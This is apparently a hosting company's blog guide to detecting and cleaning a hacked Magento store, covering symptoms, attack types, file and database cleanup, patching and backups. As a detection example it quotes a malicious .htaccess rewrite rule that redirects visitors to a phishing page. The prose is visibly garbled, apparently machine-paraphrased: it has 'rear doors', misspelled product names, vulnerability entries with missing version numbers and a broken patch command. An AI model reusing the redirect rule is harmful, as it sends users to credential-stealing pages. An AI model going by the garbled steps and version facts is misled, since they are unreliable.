How to clean hacked Magento site 2023? A step by step guide

clean hacked magento site

If your Magento site has been attacked or contains malware, you have come to the right place to learn how to clean hacked Magento site. For e-commerce merchants, hacked websites mean a loss of trust, as well as a loss of currency. Customers do not want to visit or engage in commercial interactions on any hacked websites.

If your website accepts credit card payments, site visitors will not be inclined to share their credit card details or credentials. If the data is stolen and misused, customers can file demands that they may have to face. Standard payment card industry data security (PCI DSS) standard.

Magento is an open-source e-commerce platform. It is considered to have strong safety features and is a safe and stable platform.

Your Magento store should always stay up to date. Check and update your Magento website today to the latest compatible version. Obsolete and faulty plugins and extensions can also be problematic. Once you have finished reviewing the symptoms listed below.

Symptoms of hacked Magento store are:-

  • Your home page has been destroyed. This could be due to hate attacks or just for fun.
  • Your website host suspends your website due to malicious activity
  • Top browsers blacklist/cut your site
  • Unauthorized Administrator Accounts
  • Customers Express Concern About Misuse of Credit Card Information
  • Payment page shows suspicious behavior
  • Very slow website
  • Unauthorized code on your website

Find Location of Attacks

config .php and.php

config.php and env.php are important files for Magento installation. It is part of the Magento 2 deployment configuration and consists of shared, system-specific configurations installed by Magento 2.

The Magento implementation configuration is divided into app/etc/config.php and app/etc/env.php. These documents essentially facilitate the connection between the file system and the database. env.php contains database connection credentials. In addition to this, it can also be used for:

  • Defining the security key.
  • Specifying the database prefix.
  • Set the default language for the admin panel.

The app/etc/config.php is an automatically generated file that stores a list of installed modules, themes, and language packs as well as shared configurations. It does not exist in Magento 2 repo/release because it is generated automatically.

As of Magento 2.2, the application/etc/config.php file is no longer an entry in the.gitignore file. This is done to promote better software development.


As a result, attackers use it for various attacks, such as vandalizing stores. Or sometimes ransomware could encrypt the entire contents of the file and just leave index.php in need of a rescue.

Rename the index file to index.php.old when you upgrade the system. The files contain important information that an attacker can later discover using an automatic scanner.


Configuration changes for Magento can be made using the.htaccess files. Allows users to modify the main settings defined in httpd.conf/apache.conf.

The instructions provided in the htaccess file apply to folders and directories. In addition, the.htaccess file helps you modify how the website is accessed. In addition, .htaccess is available for:

  • Block access to certain folders stored by Magento.
  • Create a redirection for the store.
  • Force https.
  • Facilitate some hyphen injection attacks in the store.
  • Block user name by enumerating bots.
  • Lock image hotlink.
  • Force automatic download of files from storage.

When this powerful file is broken, an attacker can use it to send spam. htaccess files can be injected with malicious code to redirect users. For further clarification, one of these malicious code signatures is given below:

RewriteEngine On 
RewriteOptions inherit 
RewriteCond %{HTTP_REFERER} .**$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] 
RewriteCond %{HTTP_REFERER} .**$ [NC] 
RewriteRule .* http://PhishingDomain.tld/phish.php?t=3 [R,L]

Users are redirected to http://phishingdomain.tld. This script may resemble the original login management panel. Unsuspected users can pass credentials to the attacker. This can lead to a Magento management hack.

How to clean hacked Magento sites infographic

Common Types of Attack on Magento store

Magento released a key update package called SUPEE-10975 on November 28, 2018. This contains some important security updates on vulnerabilities that can lead to compromises for Magento storage. Some common attacks include:

Magento Authentication Brute Force

Magento Authentication Brute Force allows an attacker to test multiple passwords until the correct one is found. One such vulnerability, named PRODSECBUG-1589, was found. This affects Magento open source before and Magento commerce before

Some of these nodes require administrator authentication, and an attacker can guess the administrator password.

Remote execution of Magento code

Magento Community Edition and pre-2.0.6 Enterprise Edition are vulnerable to RCE errors. This vulnerability essentially allows a remote attacker to perform a PHP objection injection attack. Arbitrary PHP code with carefully compiled serialized data from the shopping cart.

This vulnerability has been published and a metadata module can be used. Another RCE defect known as PRODSECBUG-2159 was found in the open-source before, while Magento commerce before and Magento 2.1 before 2.1.16, Magento 2.2 before 2.2.7.

You have a cvss3 In addition to that, the SUPEE-10975 security update contains several RCE related security updates. Some updates are as easy to use as uploading files when attaching videos (PRODSECBUG-2156).

Magento Cross-Site Scripting

XSS vulnerability is one of the most common vulnerabilities found on the web that affects Magento stores. One of these XSS errors is called ODSECBUG-2053, which affects open-source Magento before, and Magento 2.1 before, Magento 2.2 before 2.1.16.

These versions are vulnerable to XSS attacks through press release templates. An XSS attack can allow an attacker to induce an administrator to filter login credentials via javascript phishing, resulting in a Magento management hack.

Magento Cross-Site Request Forgery

Magento’s CSRF attacks basically induce users to execute unwanted requests on the web application they are using. However, it is worth noting here that the attacker can only execute the request and the attacker can not see the answer, which means that the data theft does not exist.

Multiple CSRF bugs have been uncovered in Magento dubbed as PRODSECBUG-2125, PRODSECBUG-2088, and PRODSECBUG-2140. It can result in deletion of:-

  • All the blocks at once.
  • Multiple client groups stored by updating Magento permissions.
  • Map of the website of the Magento store.

In the last step, you collected information about potentially compromised customer data, user accounts, malware locations, and uploads. In this step, you will remove the Magento hack and return your e-commerce site to a clean state.

Note:- The best way to identify a hacker file is to compare the current state of the site with a new installation file or a clean backup. Any difference between the two versions can help you identify what the hacker has modified.

Some of these steps require access to the webserver and database. If you don’t like manipulating database tables or editing PHP, seek help from a professional to completely eliminate Magento malware.

How to clean hacked Magento site?

If any of the above scan or diagnostic pages show malicious domains or uploads, you can first find these files on the Magento web server. Comparing infected files with known-good files (from official sources or reliable cleanup backups) can help you identify and eliminate malicious changes.

Remove Hacked Website Files

When your file is compared to a good copy, be sure to use the same version of the file and core Magento extension, including patches for any application.

To manually remove malware infections from Magento files:

  • Log in to your server via SFTP or SSH.
  • Create a backup copy of the site file before making changes.
  • Search your file to reference a malicious domain or a log load.
  • Identify recently modified files and confirm that they are legal.
  • View the files marked by the diff command during the integrity checks of the main file.
  • Restore or compare suspicious files with clean backups or official sources.
  • Remove any suspicious or unknown code from your custom file to verify that the site can still run after the change.

If you don’t find malicious content, try searching the web for any spam, payloads, or malicious domain names you encounter in step one. It is possible that another Magento user already knows how these parts are involved in the trick you are trying to clean up.

It is recommended to reinstall all extensions after hacking to ensure that they work properly and there is no residual malware. If you have disabled themes, components, modules, or plugins, we recommend that you remove them from the webserver.

Remove hacked database tables

Eliminate malware infections from the Magento database and you can log in to the administration area and open cms or sections of content to edit static blocks, posts, and pages on your website.

This interface provides some access to modify the contents of the database and is usually valid. A tool such as the level database administration panel (such as PHPMyAdmin) or searches for replacement databases and administrators.

To manually remove malware infections from the Magento database table:

  • Log in to the Database Management pane.
  • Back up the database before making changes.
  • Search for suspicious content (e.g., spam keywords, links).
  • Open a table that contains suspicious content.
  • Delete any suspicious content manually to verify that the site can still run after the change.
  • Delete all database access tools that you uploaded.

You can manually search your Magento database for common PHP malicious functions like eval, base64_decode, gzinflate, preg_replace, str_replace, etc., in addition, the most common location of Magento malware is core_config_data Table.

Manually removing “malicious” code from files on your website can be extremely dangerous to the health of your website. If you’re not sure, ask a professional for help.

Remove hidden rear doors

Hackers are almost always left with a way back to their site if the original vulnerability is patched. Most of the time, we found multiple rear doors at the hacker’s Magento sites.

The back door is usually found in new files called what looks like the official Magento main file. Attackers can also inject backdoors and malware into major Magento locations, such as footer areas.

To check the injections in the footer of Magento:

  • Log in to your Magento admin panel.
  • Click cms or content in the menu item.
  • Select a static block or block from the list.
  • Click to open the footer link block.
  • View malware content.

Remove the back door by comparing Magento files:

  • Confirm your Magento version in the lower right corner of the board.
  • Download the same version of the proven main file from the official Magento community.
  • Log in to your server via SFTP or SSH
  • Create a backup copy of the site file before making changes.
  • compare your website with a known-good download.
  • Investigate any new files on the server that do not match a known-good file.
  • Investigate any files that are not the same size as the normally known file.
  • Delete any suspicious content or replace the file with a known-good copy.
  • Log in to the Magento admin panel.
  • Click System on the menu item and select Cache Management under Tools.
  • Click Update Magento cache (and update the cache-store in Magento 1.x).
  • Test any changes.

Reset User Password

You must reset all user passwords with a unique strong password to prevent re-infection. If your version of Magento is not patched, you may want to patch your site first. If the patch is out of date, an attacker can steal Magento user credentials from the backend.

Delete the user password in the Magento:

  • Log in to your Magento administration area.
  • Click the system in the menu item and select users or all users with permissions.
  • Click any user in the list.
  • Enter a new password for the user in the New Password and Password Confirmation fields.
  • Enter the password in the password field (if using Magento 2.x).
  • Click Save Users.

You must reduce the number of user accounts with administrator roles. This will extend to your ftp account and website system. Give users only the access they need.

Fix Malware Warnings

If it appears on the blacklist of Google, McAfee, Yandex (or any other webspam agency), you can request a review after hack fixes. Google now limits the recurrence of intentionally hosting/spreading malware on its website to a review request every 30 days. Censorship!Blacklist Warning

Remove the malware warning on the site:

  • Call your hosting company and ask them to cancel the moratorium.
  • You may want to provide more information about how to remove malware.
  • Fill out a review request form for each blacklisted institution i.e. the Google search console, consultant of the site McPhee, Yandex web administrator.
  • The review process may take several days.

Steps to prevent attacks to happen in future

Update and reset configuration settings

Unpatched and obsolete software is one of the main causes of infection, and it is important to remove any extensions known to be vulnerable. The password must also be reset to ensure that if the hacker gains access to your credentials, it does not become infected again.

You must update all Magento software, including the main files, components, templates, modules and plugins. You can also check if your extension has known vulnerabilities using the free wizard reporting tool.

To apply Magento patches and updates:

  • Make sure you have the most recent backup of the site.
  • Download a specific patch for your Magento version from the Magento download page.
  • Upload or.patch file to your Magento root.
  • If your Magento store is compiled, disable the compiler in System > Tools > Compile.
  • Connect to your site via ssh and run the following matching command to apply it to the patch file extension:
 patch --p0 example_patch_name_12345.patch
 unzip -o
 tar -zxf
 tar.bz2 tar -jxf
  • Test Magento storage to confirm functionality.
  • If you disable it in step 4, run the compiler.

Magento has a built-in cache system that needs to be reset once the site is clean. Reset the cached version of Magento website:

  • Make sure you have the most recent backup of the site.
  • Log in to your Magento admin panel.
  • Click System on the menu item and select Cache Management under Tools.
  • Click Update Magento cache (and update the cache-store in Magento 1.x).

Configure backups

Backup functions such as safety net. Now your Magento site is clean and you have taken some important post-hack steps to make a backup! Having a good backup strategy is the heart of a good security posture.

Here are some tips to help you back up your website:


Store the Magento backup in an offsite location. Do not store backups (or earlier versions) on your server; they could be hacked and used to damage your real website.


Ideally, backup solutions should run automatically at a frequency appropriate to your website’s needs.


The ev certificate requires further certification authority documentation to validate the organization. Visitors will see the company name in the address bar (in addition to clicking the lock icon).


Test the recovery process to confirm that your website is working.

File Type

Some backup solutions exclude certain types of files, such as video and archiving.

Scan your computer

Let all Magento users run scans with reputable antivirus programs on their operating systems.

If a user with an infected computer has access to the dashboard, then Magento may be compromised. Some infections are designed to jump from a computer to a text editor or ftp client.

Here are some of our recommended antivirus programs:

  • Pay
  • Bit Defenders, Kaspersky, Sawforth, F Safety.
  • Free
  • Malware, avast, Microsoft Security Points, Avila.

Web site firewall

You can strengthen your Magento site by limiting file permissions and using customization .htaccess rules. You can also disable the downloader and change the back-end administrative URL, and take steps to prevent cache leaks and other deployment vulnerabilities. We recommend that you consult the Magento official security best practices for more information.

This can be done using the SSL certificate to verify your business and encrypt all customer transmission data, including login pages and payment pages. This also makes it easy to detect iframe scripts and injections using the http protocol, as this causes mixed content warnings on your site.

Magento is becoming a bigger target for hackers as it gains more users and becomes a more mature open source cms option for web stores. Even if your payment is processed off-site, you need to seriously consider the firewall of the website. Management area for unauthorized users.

Try to keep up with the management challenge. The website firewall was invented to provide a peripheral defense system around your site.

Advantages of using a website firewall:

  • Preventing hacking in the future
  • Virtual Security
  • Block Brute Force Attacks
  • Reduce DDoS Attacks
  • Performance Optimization

Also Read:

PCI Compliance

Unfortunately, most Magento sites that handle payments themselves do not meet PCI standards. This is often associated with a common misconception that the use of SSL during the payment process is sufficient to avoid violations. Transmitting credit card data is only one of twelve requirements. Requirements are set by major credit card companies such as Visa, Mastercard and American Express.

Designed to protect online shoppers from credit card theft, any e-commerce site could be subject to access. If the website is found not to comply, there may be serious consequences, such as fines, fees, and repair costs

Latest Magento Tips, Guides, & News

Stay updated with new stuff in the Magento ecosystem including exclusive deals, how-to articles, new modules, and more. 100% Magento Goodness, a promise!

Leave a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Scroll to Top

We can help you. Right now.

Fast growing merchants depend ServerGuy for high-performance hosting. Experience counts. Let's get started.

Talk to a sales representative

USA / Worldwide




Core Web Vitals Book COver

Is your website ready for Core Web Vitals?

Take this FREE book with you and optimize your store for speed.

Learn all about new Google new ranking factors and get that top ranking.